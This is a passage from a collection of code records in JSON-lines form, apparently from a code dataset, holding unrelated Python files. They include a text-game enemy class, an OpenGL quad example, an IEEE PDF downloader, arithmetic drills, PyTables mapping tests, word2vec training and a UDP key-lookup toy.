name='medicamento_new'),\n]\n","sub_path":"pds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"391333009","text":"from room import *\r\n\r\nenemy_data = {'Wandering Nose':{'HP':14,'ATK':7,'DEF':5},\r\n 'Floating Knutsack':{'HP':26,'ATK':6,'DEF':8},\r\n 'Tendie Thief':{'HP':12,'ATK':12,'DEF':4}}\r\n\r\nclass Enemy(Room):\r\n def __init__(self, room_name, enemy_name):\r\n super().__init__(room_name)\r\n self.name = enemy_name\r\n self.hp = enemy_data[enemy_name]['HP']\r\n self.atk = enemy_data[enemy_name]['ATK']\r\n self.defense = enemy_data[enemy_name]['DEF']\r\n\r\n def enemy_attack(self, target):\r\n if (self.room_name == target.room_name) and (target.hp > 0) and (self.hp > 0):\r\n damage = (self.atk + random.randint(-3,3)) - target.defense\r\n\r\n if damage <= 0:\r\n damage = 0\r\n print(self.name, 'missed!')\r\n else:\r\n target.hp -= damage\r\n if target.hp <= 0:\r\n target.hp = 0\r\n print(target.name, 'was defeated!')\r\n else:\r\n print(self.name, 'dealt', damage, 'damage to', target.name)","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308608904","text":"from glumpy import app, gloo, gl\n\nvertex = \"\"\"\nattribute vec2 position;\nattribute vec4 color;\nvarying vec4 v_color;\nvoid main()\n{\n gl_Position = vec4(position, 0.0, 1.0);\n v_color = color; \n}\n\"\"\"\n\nfragment = \"\"\"\nvarying vec4 v_color;\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\n\ndef main():\n\n window = app.Window()\n quad = gloo.Program(vertex, fragment, count=4)\n quad['position'] = (-1, +1), (+1, +1), (-1, -1), (+1, -1)\n quad['color'] = (1, 1, 0, 1), (1, 0, 0, 1), (0, 0, 1, 1), (0, 1, 0, 1)\n\n @window.event\n def on_draw(dt):\n window.clear()\n quad.draw(gl.GL_TRIANGLE_STRIP)\n\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162449987","text":"\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport traceback\nimport requests\nimport PyPDF2\nimport os\nimport uuid\nimport time\n\ndriver_path = r\"C:\\File\\tools\\webdriver\\chromedriver.exe\"\ndriver = webdriver.Chrome(driver_path)\n\n\n\n\ndef download(url, file):\n # time.sleep(random.random()*3+1)\n # proip =find_proxy_ip()\n # print(url)\n header={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\n\n data = requests.get(url.strip(),headers=header,verify=False,timeout=30)\n # print(data.cookies)\n # print(data.text)\n data.encoding = 'utf-8'\n file = open(file, \"wb+\")\n file.write(data.content)\n\ndef checkpdf(file):\n\n try:\n pdffile = open(file, \"rb+\")\n pdf = PyPDF2.PdfFileReader(pdffile, strict=False)\n num=pdf.getNumPages()\n pdffile.close()\n return num\n except:\n print(\"PDF下载出错。\")\n try:\n pdffile.close()\n os.remove(file)\n except:\n print(\"PDF删除出错.\")\n raise ValueError(\"PDF出错!\")\n\ndef creat_filename(dir):\n uid=str(uuid.uuid1())\n suid=''.join(uid.split('-'))\n return os.path.join(dir,suid+\".pdf\")\n\n\nif __name__ == '__main__':\n\n path=r\"C:\\temp\\ieee.txt\"\n writer=open(r\"C:\\temp\\ieee_w.txt\",\"w+\",encoding=\"utf-8\")\n dir=r\"C:\\pdfs\\osti_o2\"\n f=open(path,encoding=\"utf-8\")\n for url in f.readlines():\n time.sleep(5)\n try:\n url=url.replace(\"\\n\",\"\")\n driver.get(url)\n a=driver.find_element_by_class_name(\"doc-actions-link\")\n a.click()\n soup=BeautifulSoup(driver.page_source,\"html.parser\")\n # print(soup)\n iframe=soup.find_all(\"iframe\")\n\n for item in iframe:\n try:\n\n pdf_url=item[\"src\"]\n except:\n pass\n print(pdf_url)\n try:\n file = creat_filename(dir)\n download(pdf_url, file)\n num = checkpdf(file)\n writer.write(url + \"##\" + pdf_url+ \"##\" + file + \"##\" + str(num) + \"\\n\")\n except:\n traceback.print_exc()\n print(\"下载出错!\")\n except:\n traceback.print_exc()\n\n driver.close()","sub_path":"ieee_pdf.py","file_name":"ieee_pdf.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"394815987","text":"import random\nimport os\nimport time\nfrom colorama import Fore, Style\nimport operator\n\nOPERATOR = '*'\nSTART1 = 2\nEND1 = 13 \nSTART2 = 6\nEND2 = 9 \n\n\n\nclass Question:\n answer_given = 0\n correct = False\n correct_answer = 0\n ops = {\n '+': operator.add,\n '*': operator.mul,\n '-': operator.sub,\n }\n time_taken = 0\n\n def __init__(self, num1, num2, op):\n self.num1 = num1\n self.num2 = num2\n self.op = op\n\n def question_str(self):\n q = '\\n{} {} {} = '.format(self.num1, self.op, self.num2)\n return(q)\n\n def get_answer(self):\n op_func = self.ops[self.op]\n self.correct_answer = op_func(self.num1, self.num2)\n return self.correct_answer\n\n def check_answer(self):\n if self.answer_given == self.get_answer():\n self.correct = True\n else:\n self.correct = False\n return self.correct\n\n\ndef print_msg(msg, correct):\n if correct:\n msg = (\n Fore.GREEN +\n msg +\n Style.RESET_ALL\n )\n else:\n msg = (\n Fore.RED +\n msg +\n Style.RESET_ALL\n )\n print(msg)\n\n\ndef print_bold(msg):\n msg = (\n Fore.BLUE +\n msg +\n Style.RESET_ALL\n )\n print(msg)\n\n\ndef print_head(op):\n if op == '+':\n print_bold('Addition Drills')\n print_bold('---------------')\n elif op == '*':\n print_bold('Multiplication Drills')\n print_bold('---------------------')\n elif op == '-':\n print_bold('Subtraction Drills')\n print_bold('------------------')\n\n\nif __name__ == \"__main__\":\n os.system('cls' if os.name == 'nt' else 'clear')\n print(Style.RESET_ALL)\n print_head(OPERATOR)\n total_start = time.time()\n\n q_list = []\n score = 0\n total = 0\n for i in range(START1, END1):\n for j in range(START2, END2):\n if OPERATOR == '-':\n if i > j:\n q = Question(i, j, OPERATOR)\n q_list.append(q)\n else:\n q = Question(i, j, OPERATOR)\n q_list.append(q)\n\n random.shuffle(q_list)\n for rec in q_list:\n start = time.time()\n while True:\n try:\n rec.answer_given = int(input(rec.question_str()))\n break\n except ValueError or EOFError:\n print(\"Please enter a number.\")\n\n if rec.check_answer():\n\n print_msg('Correct!!', rec.check_answer())\n score += 1\n else:\n msg = ('\\aWrong!! The correct answer is {}'.format(rec.correct_answer))\n print_msg(msg, rec.check_answer())\n total += 1\n end = time.time()\n elapsed = time.strftime(\"%M:%S\", time.gmtime(end - start))\n rec.time_taken = elapsed\n total_elapsed = time.strftime(\"%M:%S\", time.gmtime(end - total_start))\n print('Elapsed (mm:ss): {}'.format(elapsed))\n print('Total Elapsed (mm:ss): {}'.format(total_elapsed))\n # print results\n print('\\n-----------------------')\n print('')\n result_str = {\n True: 'Correct',\n False: 'Wrong'\n }\n for i, rec in enumerate(q_list):\n q_str = 'Q{}: {} {} {} = {}, your answer {} is {}, {}'.format(i+1, rec.num1, OPERATOR, rec.num2, rec.correct_answer, rec.answer_given, result_str[rec.correct], rec.time_taken)\n print_msg(q_str, rec.check_answer())\n print('\\n-----------------------')\n print('Score: ' + str(score) + ' / ' + str(total))\n print('Score : {}%'.format((score/total) * 100))\n print('Total Elapsed (mm:ss): {}'.format(total_elapsed))\n print('\\n-----------------------')\n print('\\nBye!! and Keep Practicing!!!')\n print(Style.RESET_ALL)\n","sub_path":"drills_plus.py","file_name":"drills_plus.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433925494","text":"import webbrowser\n\n\nclass Movies:\n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube):\n \"\"\"creates an object movie, with four parameters\n movie title, storyline, poster image and youtube trailer url\n \"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"passes the youtube url to the webbrowser method which \n opens a website with the entered url\n \"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351208652","text":"import unittest\n\nimport tables as tb\n\nfrom pytables_mapping.tests.consts import *\nfrom pytables_mapping.tests.test_store import CustomTestCase\nimport pytables_mapping as mapping\n\n\nclass TestArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n array = mapping.Array(TEST_ARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n shape=TEST_ANY_ARRAY_SHAPE)\n\n\nclass TestCArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n carray = mapping.CArray(TEST_CARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n shape=TEST_ANY_ARRAY_SHAPE,\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass TestEArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n earray = mapping.EArray(TEST_EARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n shape=(0,),\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass TestVLArrayStore(mapping.HDF5Store):\n\n ARRAY_PATH = '/arrays'\n vlarray = mapping.VLArray(TEST_VLARRAY_OBJECT_NAME, ARRAY_PATH,\n atom=TEST_ANY_ARRAY_ATOM,\n expected_rows=TEST_ANY_ARRAY_EXPECTED_ROWS,\n filters=consts.DEFAULT_DATA_FILTER)\n\n\nclass ArraysMappingTestCase(CustomTestCase):\n\n def test_array(self):\n with TestArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.array.node, tb.Array)\n self.assertIsInstance(store.array.parent_node, tb.group.RootGroup)\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n store.array[0:TEST_ANY_ARRAY_LENGTH] = TEST_ANY_ARRAY\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n\n with TestArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.array.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n data1 = list(store.array[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.array.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_carray(self):\n with TestCArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.carray.node, tb.CArray)\n self.assertIsInstance(store.carray.parent_node, tb.group.RootGroup)\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n store.carray[0:TEST_ANY_ARRAY_LENGTH] = TEST_ANY_ARRAY\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n\n with TestCArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.carray.nrows, TEST_ANY_ARRAY_EXPECTED_ROWS)\n data1 = list(store.carray[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.carray.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_earray(self):\n with TestEArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.earray.node, tb.EArray)\n self.assertIsInstance(store.earray.parent_node, tb.group.RootGroup)\n self.assertEqual(store.earray.nrows, 0)\n store.earray.append(TEST_ANY_ARRAY)\n self.assertEqual(store.earray.nrows, TEST_ANY_ARRAY_LENGTH)\n\n with TestEArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.earray.nrows, TEST_ANY_ARRAY_LENGTH)\n data1 = list(store.earray[0:TEST_ANY_ARRAY_LENGTH])\n data2 = list(store.earray.read(stop=TEST_ANY_ARRAY_LENGTH))\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n def test_vlarray(self):\n with TestVLArrayStore(TEST_FILE_NAME, mode='w') as store:\n self.assertIsInstance(store.vlarray.node, tb.VLArray)\n self.assertIsInstance(\n store.vlarray.parent_node,\n tb.group.RootGroup)\n self.assertEqual(store.vlarray.nrows, 0)\n store.vlarray.append(TEST_ANY_ARRAY)\n self.assertEqual(store.vlarray.nrows, 1)\n\n with TestVLArrayStore(TEST_FILE_NAME) as store:\n self.assertEqual(store.vlarray.nrows, 1)\n data1 = list(store.vlarray[0])\n data2 = list(store.vlarray.read()[0])\n self.assertEqual(data1, TEST_ANY_ARRAY_AS_LIST)\n self.assertEqual(data2, TEST_ANY_ARRAY_AS_LIST)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pytables_mapping/tests/test_arrays.py","file_name":"test_arrays.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"317975568","text":"#!/usr/bin/env python3\n\nimport os.path\nfrom setuptools import setup, find_packages\n\nbase_dir = os.path.abspath(os.path.dirname(__file__))\n\nabout = {}\nwith open(os.path.join(base_dir, \"result_parser\", \"__about__.py\"),\n encoding='utf-8') as f:\n exec(f.read(), about)\n\nif os.path.isfile(os.path.join(base_dir, 'README.md')):\n with open(os.path.join(base_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nelse:\n long_description = ''\n\nsetup(\n name=about['__name__'],\n version=about['__version__'],\n description=about['__summary__'],\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=about['__uri__'],\n author=about['__author__'],\n author_email=about['__email__'],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: System Administrators',\n 'Topic :: System :: Benchmark',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n keywords='benchmark hypervisor',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n python_requires='>=3.6',\n install_requires=['matplotlib'],\n entry_points={\n 'console_scripts': [\n 'result-parser=result_parser:main',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579363553","text":"import logging\n\n\nclass Blocks:\n def __init__(self):\n logging.info(\"Loading block names from 'data/items.tsv\")\n self.data = {}\n with open('data/items.tsv', 'r') as fd:\n for line in fd.readlines():\n part = line.strip().split('\\t')\n id = (int(part[0]), int(part[1]))\n image = \"data/png/%d-%d.png\" % id\n self.data[id] = {\n 'id': id,\n 'name': part[2],\n 'image': image\n }\n\n def get(self, id):\n if id not in self.data:\n if id[1] == 0:\n logging.warn(\"Unknown block id %s\" % str(id))\n return {'name': 'Unknown', 'image': '', 'id': id}\n logging.warn(\"Unknown block id %s -> using data from (%d, 0)\" % (str(id), id[0]))\n info = self.get((id[0], 0))\n info['id'] = id\n return info\n return self.data[id]\n\n def name(self, id):\n return self.data[id]['name']\n\n def image(self, id):\n return self.data[id]['image']","sub_path":"buildking/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527522399","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nauthor: xlingbai@gmail.com\nfile: train_word2vec\ndate: 2018/3/30\nbref: 训练word2vec\n\"\"\"\n\nfrom gensim.models import word2vec\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\n\n\n\n\nraw_sentences = ['the quick brown fox jumps over the lazy dogs ', 'yoyoyo you go home now to sleep']\nsentences = [s.split() for s in raw_sentences]\n\nprint(sentences)\n\n# train = pd.read_csv(\"../input/unlabeledTrainData.tsv\", delimiter='\\t')\n\n# print(len(train['review']))\n\n\npath =\"../input/clean_unlabeledTrainData.tsv\"\nsentences = []\n\nwith open(path, \"rb\") as f:\n for line in f:\n sentences.append(str(line, encoding=\"utf-8\").split(\"\\t\")[1].split(\" \"))\n\n\n# print(sentences)\n\nfrom gensim.models import Word2Vec\n\n# 模型参数\nnum_features = 300 # Word vector dimensionality\nmin_word_count = 20 # Minimum word count\nnum_workers = 5 # Number of threads to run in parallel\ncontext = 20 # Context window size\ndownsampling = 1e-3 # Downsample setting for frequent words\n\nprint(\"训练模型中...\")\nmodel = Word2Vec(sentences, workers=num_workers, \\\n size=num_features, min_count=min_word_count, \\\n window=context, sample=downsampling)\n\n# 训练模型中...\n# CPU times: user 6min 16s, sys: 8.34 s, total: 6min 24s\n# Wall time: 2min 27s\nprint('保存模型...')\nmodel.init_sims(replace=True)\nmodel_name = \"./300features_20minwords_20context\"\nmodel.save(model_name)\n","sub_path":"code/kaggle/BagMeetsBagsofPopcorn/code/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189965579","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py as h5\nplt.ion()\n\n\nf = open('pmtlog_file.txt','r')\nlines = f.readlines()\nn = len(lines)\ndata = []\nfor i,line in enumerate(lines):\n data.append(np.fromstring(line, dtype=float, sep=' '))\n print(i, 'of', n, end='\\r')\ndata = np.array(data)\n\ndata = data.T\n\ndata[-1] = data[-1] - data[-1][0]\ntime = data[-1]/60**2\ncounts = data[0]\n\nplt.figure()\n#plt.scatter(time, counts, s=1)\nplt.yscale('log')\n#for i in range(2,6):\n# plt.figure()\n# plt.ylim(data[i].min(), data[i].max())\n# plt.scatter(time, data[i], s=1)\n\n\nm = counts < 2850\n\nmt = time > 38\nmt &= time < 51\nmc = counts > 2400\nm &= ~(mc & mt)\nmt = time > 51\nmt &= time < 53\nmc = counts > 366\nm &= ~(mc & mt)\n\ndc = counts[m]\ntdc = time[m]\nplt.scatter(tdc, dc, s=1, color='b', label='dark counts')\n\nc = counts[~m]\ntc = time[~m]\n#plt.scatter(tc, c, s=1, color='r', label='counts')\n\nm1 = c > 10**6\nc1 = c[m1]\nt1 = tc[m1]\nplt.scatter(t1, c1, s=1, color='c', label='OD1')\nm2 = ~m1 & (c > 10**5)\nc2 = c[m2]\nt2 = tc[m2]\nplt.scatter(t2, c2, s=1, color='y', label='OD2')\nm3 = ~m1 & ~m2 & (c > 10**4)\nc3 = c[m3]\nt3 = tc[m3]\nplt.scatter(t3, c3, s=1, color='b', label='OD3')\nm4 = ~m1 & ~m2 & ~m3 & (c > 10**3)\nc4 = c[m4]\nt4 = tc[m4]\nplt.scatter(t4, c4, s=1, color='r', label='OD4')\nm5 = ~m1 & ~m2 & ~m3 & ~m4 & (c > 10**2)\nc5 = c[m5]\nt5 = tc[m5]\nplt.scatter(t5, c5, s=1, color='g', label='OD5')\n\nplt.legend()\n\n#plt.figure()\n#plt.title('OD1')\n#plt.hist(c1, bins='auto')\n#plt.figure()\n#plt.title('OD2')\n#plt.hist(c2, bins='auto')\n#plt.figure()\n#plt.title('OD3')\n#plt.hist(c3, bins='auto')\n#plt.figure()\n#plt.title('OD4')\n#plt.hist(c4, bins='auto')\n#plt.figure()\n#plt.title('OD5')\n#plt.hist(c5, bins='auto')\n\nstd=np.array((np.std(c1),np.std(c2),np.std(c3),np.std(c4),np.std(c5)))\nmean=np.array((np.mean(c1),np.mean(c2),np.mean(c3),np.mean(c4),np.mean(c5)))\nplt.figure()\nplt.scatter(-1, np.std(dc)/len(dc)**0.5/np.mean(dc), label='dc')\nplt.scatter(range(1,6), std/mean, label='std')\nplt.scatter(range(1,6), 1/mean**0.5, label='stat')\nplt.xlabel('OD')\nplt.ylabel('Relative error')\nplt.legend()\n\n\n\n\n\n\n","sub_path":"jakob.py","file_name":"jakob.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281665884","text":"#Import all functions\nimport socket\nimport sys\nimport argparse\nimport threading\nimport time\nimport multiprocessing\nfrom datetime import datetime\n\n#Initialize all global variables\nglobal args \nglobal my_node_no\nglobal connected_peers\nglobal my_key\nglobal debug_mode \ndebug_mode = True\nglobal exited\nexited = False\nglobal sent_datas\nsent_datas = \" \"\nglobal now_sent \nnow_sent= False\nglobal wait_to_recieve\nwait_to_recieve = False\nglobal already_parsed\nalready_parsed = set()\n\nglobal p\n\nbase_port = 50000\nUDP_IP = \"127.0.0.1\"\ntimeout_node = 10\n\n\n#Start all functions\ndef send():\n\t\n\tglobal exited\n\tglobal now_sent\n\tglobal already_parsed\n\tglobal p\n\tglobal wait_to_recieve\n\tglobal sent_datas\n\n\twhile True:\n\t\ttime.sleep(1)\n\t\t#print(end)\n\t\t\n\t\tkey = str(input(\"\\n\\n------\\nEnter key to check value:\"))\n\t\t\n\t\tif key == \"exit\":\n\t\t\texited = True\n\t\tUDP_PORT = base_port+int(my_node_no)\n\n\t\t#Message format -> R ;; from ;; time_sent ;; requsted_key ;; key value ;; nodes traversed\n\n\t\tcurrent_time=str(time.time())\n\t\tMESSAGE = \"R;;\"+str(my_node_no)+\";;\"+current_time+\";;\"+key+\";; value ;;\"\n\t\tsent_datas=str(my_node_no)+current_time\n\n\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n\t\t\n\t\tfor nodes in connected_peers:\n\t\t\tMESSAGE_SEND2 = (MESSAGE+\"\"+str(my_node_no)+\" -> \")\n\t\t\tsend_port = base_port+int(nodes)\n\n\t\t\tif int(nodes) > int(my_node_no):\n\t\t\t\tprint(\"Message sent to {0}\".format(send_port))\n\t\t\t\tsock.sendto(bytes(MESSAGE_SEND2,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\tbreak\n\t\t\t\t\n\n\t\ttime.sleep(5)\n\t\tif sent_datas != \" \":\n\t\t\tprint(\"No message recieved\")\n\t\t\talready_parsed.add(sent_datas)\n\t\t\t\t\t\n\n\n\ndef recieve():\n\n\t\n\tglobal sent_datas\n\tglobal already_parsed\n\n\tUDP_PORT = base_port+int(my_node_no)\n\n\tserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tserverSock.bind((UDP_IP, UDP_PORT))\n\n\tprint(\"Started listener\\n\")\n\twhile True:\n\t\tif exited == True:\n\t\t\tbreak\n\t\t\n\n\n\t\t#Recieve and decode message\n\t\tdata, addr = serverSock.recvfrom(1024)\n\t\t#print(\"Recieved data: {0}\".format(data.decode('utf-8')))\n\t\tmessage1 = data.decode('utf-8')\n\t\tmessage = message1.split(\";;\")\n\t\t\n\t\ttimed_out = time.time() - float(message[2])\n\n\t\trec = str(message[1])+str(message[2])\n\n\t\t\n\t\tif rec not in already_parsed and timed_out<10:\n\n\t\t\tif int(message[1]) == int(my_node_no):\n\t\t\t\tif \"Response\" not in message1:\n\t\t\t\t\tprint(\"Message not recieved\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\n\\n----\\n\\nGot my node :\\n{0}\\n\".format(message))\n\t\t\t\t\tprint(\"Path traversed is:\\n{0}\".format(message[5]))\n\n\t\t\t\t\talready_parsed.add(rec)\n\t\t\t\tsent_datas=\" \"\n\n\t\t\telif int(message[3]) == my_key:\n\n\t\t\t\t\tmessage1 = message1+\" -> \"+str(message[1])\n\t\t\n\t\t\t\t\tmessage1.replace('value',str(my_key*my_key))\n\t\t\t\t\tmessage1.replace(\"R\",str(my_node_no))\n\t\t\t\t\tsend_message = message1+\"\\nResponse : \" +str(my_key*my_key)\n\t\t\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\t\t\tsend_port = base_port+int(message[1])\n\t\t\t\t\tsock.sendto(bytes(send_message,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\t\talready_parsed.add(rec)\n\n\n\t\t\telse:\n\t\t\t\tmessage1 = message1+str(my_node_no)+\" -> \"\n\t\t\n\t\t\t\t#Prepare message sending\n\t\t\t\t\n\t\t\t\tsend_message = message1\n\t\t\t\t\n\t\t\t\tset_add = rec\n\n\t\t\t\talready_parsed.add(set_add)\n\n\t\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n\t\t\t\tfor nodes in connected_peers:\n\t\t\t\t\tif int(nodes) != int(message[1]):\n\t\t\t\t\t\tif int(nodes) > int(my_node_no):\n\t\t\t\t\t\t\tMESSAGE_SEND = (message1+str(nodes))\n\t\t\t\t\t\t\tsend_port = base_port+int(nodes)\n\t\t\t\t\t\t\tsock.sendto(bytes(MESSAGE_SEND,\"UTF-8\"), (UDP_IP, send_port))\n\t\t\t\t\t\t\tbreak\n\ndef bar():\n\tfor i in range(3):\n\t\ttime.sleep(1)\n\ndef init():\n\tglobal args\n\tglobal my_node_no\n\tglobal connected_peers\n\tglobal my_key\n\tglobal debug_mode \n\n\tparser = argparse.ArgumentParser(description=\"A program for implementing DHT\")\n\tparser.add_argument('-i',help=\"Current node number\", type=int)\n\tparser.add_argument('-n',help=\"List of peers near you\", required=True)\n\tparser.add_argument('-s',help=\"Key value held by node\", type=int, required=True)\n\tparser.add_argument('-m',help=\"Number of bits\")\n\tparser.add_argument('-a',help=\"Send DHT key to all connected nodes\")\n\tparser.add_argument('-d',help=\"Enable debug mode\")\n\targs = vars(parser.parse_args())\n\n\tmy_node_no = args['i']\n\tconnected_peers1 = str(args['n'])\n\tconnected_peers = connected_peers1.split(\",\")\n\tmy_key = args['s']\n\t\n\n\tprint(\"All values initiated\")\n\tprint(\"Current node:{0}\".format(args['i']))\n\tprint(\"Connected node:{0}\".format(args['n']))\n\tprint(\"Key value:{0}\\n\\n--------\".format(args['s']))\n\n\nif __name__ == \"__main__\":\n\tinit()\n\tthreading.Thread( target=recieve ).start()\n\tthreading.Thread( target=send ).start()\n\n\t#timeouts.bar(3)\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"507655883","text":"\"\"\"File containing the Response class, finding the answers to a given question.\"\"\"\n\nfrom random import choice\n\nfrom .address import Address\nfrom .models import ADDRESS_FOUND, ADDRESS_NOT_FOUND, EMPTY, STORY_FOUND, STORY_NOT_FOUND\nfrom .parser import Parser\nfrom .find_story import find_story\n\n\ndef find_responses(message, api_key):\n \"\"\"Find the appropriate answers to a given question.\"\"\"\n if not message: # If there is no question.\n return [{\"type\": \"text\", \"value\": choice(EMPTY)}]\n\n responses = []\n words = Parser().simplify(message) # Extract the meaning words.\n for request in Parser().generate_requests(words): # For each request...\n address = Address()\n if address.find(api_key, request):\n responses.append(\n {\"type\": \"text\", \"value\": choice(ADDRESS_FOUND).format(address.address)})\n responses.append({\"type\": \"image\", \"value\": address.get_map_url(api_key)})\n\n story = find_story(address.components)\n if story:\n responses.append({\"type\": \"text\", \"value\": choice(STORY_FOUND).format(story)})\n else:\n responses.append({\"type\": \"text\", \"value\": choice(STORY_NOT_FOUND)})\n return responses\n return [{\"type\": \"text\", \"value\": choice(ADDRESS_NOT_FOUND)}]\n","sub_path":"grandpy/find_responses.py","file_name":"find_responses.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83420603","text":"from core.api.request_api.RequestApi import RequestApi\n\n\ndef test_get_id_value_sendingValidRow_keyRow_valueAndDictionary_return1231231312aa2212133():\n row_key = \"boardObject\"\n row_value = \"(boardObject.id)\"\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.get_id_value(row_key, row_value, id_dictionary)\n expected = \"1231231312aa2212133\"\n assert expected == actual\n\n\ndef test_get_id_value_sendingInvalidRow_keyAndValidRow_valueDictionary_returnNone():\n row_key = \"boardObject\"\n row_value = \"(NoneBoardObject.id)\"\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.get_id_value(row_key, row_value, id_dictionary)\n expected = None\n assert expected == actual\n\n\ndef test_generate_data_sendsEmptyDataTable_returnKeyAndTokenAsDataDictionary():\n data_table = None\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.generate_data(data_table, id_dictionary)\n expected = 2\n assert expected == len(actual)\n\n\ndef test_replace_variable_sendsValidDictionaryAndInputEndpoint_returnUrlConcatenatedWithId():\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": 